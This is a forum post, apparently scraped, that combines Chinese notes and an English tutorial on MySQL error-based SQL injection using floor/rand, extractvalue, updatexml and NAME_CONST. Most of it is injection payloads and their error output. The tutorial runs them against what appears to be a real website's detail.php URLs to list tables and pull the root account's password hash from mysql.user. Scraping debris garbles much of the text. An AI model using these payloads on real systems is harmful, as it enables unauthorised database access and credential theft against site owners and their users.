|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
) T# N# G& _- |: }首先进行正常查询: mysql> select * from article where id = 1;* E- D1 |1 z9 |, e! {$ k: L2 r B
+—-+——-+———+8 p: s; F, g4 j7 [3 O5 h" g
| id | title | content |7 B" T" }& ?8 L0 F9 J5 a" s; D
+—-+——-+———+/ I. p/ Y# [4 Z
| 1 | test | do it |# x! U& b" f3 |' K6 C' g6 d
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- [" C1 ~- i# H+ WERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
( y, ~6 G0 p& v$ L8 Q例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
, E) t! h7 a, y- i! S+ Y: P: x8 }ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));3 G6 G. H8 F$ @0 G) I
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue# k8 x7 J; @! h6 N6 C: x4 r$ |; p
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–' _8 h* k" ?2 \9 a1 ~% b: w
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
1 M4 W9 l" @ c6 q: z% W
" }# e! C- \. R再收集: ! h- ?. c3 N6 h5 H
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
( p7 \% N" v1 Q( R! s* i: z' O3 J* {" z
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’1 [4 o5 z0 y. y5 }% }# ^
4 E! d4 d& d8 Y+ Qhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 L9 e! i, i, W1 N! S( s0 D0 W! F
: ~9 I6 a' U8 ?8 k
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 6 _4 E$ y& |; h3 O5 r9 X6 o \
- {; x/ n' @9 Y% {& [, f
MYSQL高版本报错注入技巧-利用NAME_CONST注入* z" _7 z/ X5 W+ _, x
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. & }& g# w$ Y0 s$ T5 G# g$ B) {3 x
/ w/ \6 Q( {" e* E
' s; [6 _+ j+ X [2 ~" m相关信息% H9 G+ T' u; t2 S# W0 Z
2 `7 R9 ~1 |, r/ |
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.1 t( {( L5 @/ ?% }$ E! c
& o3 l9 A5 p+ X8 K# X! R3 x( ]Code:6 g; J: I8 {, {
NAME_CONST(DATA, VALUE)
& F8 M+ q# @0 l7 u2 y2 D" M- b$ o7 C7 C. N: Q0 I3 M1 E7 w5 v
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
6 l4 b' t8 F6 x+ d `7 c j. z, S# L# [! L2 w) O
SELECT NAME_CONST('TEST', 1)# q! g5 p" I; _; v8 [. {
% n) b; F( S) C$ V
/ L$ C- A( W3 i
' W8 u( Y t5 h# u0 ||---------------|& _$ B: L) p/ Z! l# s- V
| TEST |
2 C: ]5 h* ?2 f. f: [' L7 e6 l# ]| |
3 [' z& E+ k C5 z$ Y' t) y, H _; k|---------------|+ q! d! b5 B& @, n& F* D+ G" b
| 1 |$ [0 @+ g1 [2 k' B0 @( d0 L/ ?, Y
| |
0 C' U9 Y) F+ v) o1 h' V& I1 P|---------------|4 k5 N# o' Q5 a5 P: c# O
: i/ [2 r. p% F2 V
' ]" C/ r5 `1 ^. e# E8 M7 K- N# Z& R$ H+ h. t) s7 G& v3 s
. p& n6 E x8 m3 u# vhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const' A, c/ ~8 w J; ~5 F, Q' B
Intro to MySQL Variables7 g3 |' \0 ?/ \. [( Q `
$ P' ?$ x' [% i+ ~2 ROnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
. H% n* `7 e8 c1 B. f
, ^2 v& A4 b! PCode:6 e$ J( [: G. }9 r# k
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2614 ?: D9 @5 ^& Y/ n3 E5 S+ {' V( _
' }/ n3 N- `% d
, o) U x* y( l: V' w: C- A [
# ~3 Z6 n4 v F% h+ w1 s' w+ w& n% E; s' s. I4 t4 H9 f. h
* E- B+ D) Y+ c b. K$ U. @+ O
Code:+ X5 l& X; s$ b; P8 u0 t
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--* p1 \# V4 [ ~$ m
8 }( I% s) F$ B8 p. U) ^; e7 `# l& t* h6 S+ r- c1 `
VAR = Your MySQL variable./ ~; O* q$ W$ m: R
" E4 [/ N* B6 H3 ?- B2 WMySQL 5.1.3 Server System Variables
0 d8 J- l/ k* R' }8 J+ l* [6 O5 v+ F" o% @. Q! a
Let's try it out on my site..; P- ]/ G5 @' J2 |( `9 A. y
6 S" u2 W6 d0 E* j( n
Code:8 L! D4 |) |3 o4 Q' J
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
) l8 i7 I+ Q; _. {2 g. R- s. b9 t, J
Erroruplicate column name '5.0.27-community-nt'
. v# ?+ H, `5 H
5 I L4 Y! M: f6 s9 c+ y4 l
/ U- o Q+ j; }/ I* \4 V* q) P/ K6 j: q
$ K2 \) c7 ^$ m" ]1 e* |1 Y ^" L% h: e5 A9 p ~: x- Z. W
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
1 z. T( g% A) r
0 A, P0 p7 r+ z1 Q" q' L9 v8 [Data Extraction' H" ^0 f' T% w E
! R5 h# [8 O' m: J) z& M
Code:6 ^8 ? ]- d0 a# r% p2 R
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--4 R7 k! W* e8 Z& y, A; e
0 f( h' y0 g m7 Q! X0 G. N" N
% a( W. U% V" L* }! ?We should get a duplicate column 1 error...
$ j/ n0 u1 h$ a8 n3 ~- P r/ y5 r* W
Code:
; F5 X$ z+ o jhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--3 r. [: ?3 h% u9 {
0 @& C' G; f4 p( Y( P% c- LErroruplicate column name '1
# w* k; r! {. |/ p! D/ n/ ^& U2 ~" Q4 W2 T- p
' H5 K, l( f1 W* H3 H) n- a
S; w8 [8 r3 u4 d4 U% k
5 y A6 W8 U1 x" t$ c _- B4 `- H- M! V0 g7 p% C$ c
6 `; ?+ M; |; s" ?- \Now let's get the tables out this bitch..8 S4 D4 y6 ` \- K% U o I% N
, q- P; H/ \9 I2 s2 z
Code:; K" E! y6 g7 X# p8 a
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 v; `; p1 g+ R, V5 Y3 y) s n$ J/ e. f
8 R6 }7 S$ R6 h; ]Let's see if it works here, if it does, we can go on and finish the job.
9 D9 m7 d2 u g- P; w! b, B% P: f- N: x: w6 o; o& X
Code:4 K N+ D$ r& K' j, @. B2 M
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--3 w( r/ W# ?9 |- E y9 P
% s7 U; b8 I# j }+ V- O& d7 Z) W) p0 F! [6 Q5 \
Erroruplicate column name 'com_admanage" v/ ?7 ?- O ]* P
& U' a6 c3 q% f$ a1 @: f) D
4 H0 d2 K E7 V( f! P) B" L
/ w8 n- `; M/ S+ g8 ^, w3 q. i$ s" W- T- Y: G
\: [/ a0 Q3 _* g" z& {) _
1 U5 l" i0 Z2 Y" l, E# F0 KNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.* Z) z& N# j5 x: b7 s
) Q$ q7 {# B2 `6 t
Let's get the columns out of the user table..
6 O- F' c# u5 P/ Z `$ @
, |) m6 [& L' T; |/ g T: gCode:4 i% B& J5 @1 y! t/ @6 j
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
0 N/ O7 W5 }- b( i/ u! Q
& G: N% x7 Q: H9 D# ]+ p* Z- {7 k4 h4 u
So mine looks like this, and I get the duplicate column name 'Host'.6 L% l3 \+ {# m3 X$ X' a' x
4 A* o u( K8 X$ a- p+ aCode:& [# o( k8 h; M$ [) m
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--/ {, u" S4 W7 h5 H% k% C9 V8 j
: T+ k/ |4 o1 I
Erroruplicate column name 'Host'1 g+ g7 Z4 ]- {( v7 z# x5 U
, s# F( Q/ \8 z, V: `
. B9 ^ W3 R2 e
, I5 A% I( X0 I. l/ D: E
. H: e' R, q6 i. h2 F8 I
, j# f# d5 N0 w
) X% d O( t) p3 C# qWoot, time to finish this bitch off.7 ^5 G% V, {+ r
/ o1 P( e7 u4 [: h( m
Code:
1 k, ~1 p7 R( S. b+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 }1 M/ Z& l' i1 ^$ y" b
* z! n" P" \$ P$ D# Q0 j
9 f6 \4 q9 D; C0 {3 `6 ?6 BSo mine looks like this...! g- Q9 e8 z& g
+ M5 ?: ]* y+ X) {5 t
Code:
; H" J& v9 B: R% P% uhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
: }" f; K4 a/ O6 ]
/ h. r4 T& A3 I. |# c9 q3 NErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'# V8 ]' o( N7 E3 M; E6 t8 s: o
, t) m7 j( _2 S) J9 K
) Q9 w) c# y2 F. m& ]5 {; v o* x
0 D5 n, z) [6 U' N; I- v1 |/ s5 z2 [+ P" F
) U; }4 @$ m0 H$ Y% O3 w! f( D3 v1 ^6 o
And there we have it, thanks for reading.
' s( d1 Z; U' P, o; F+ R$ A' J
5 ^" B9 `# I" g& g; v. g3 E% k |
发表于 2015-11-11 19:03:37
收藏
支持
反对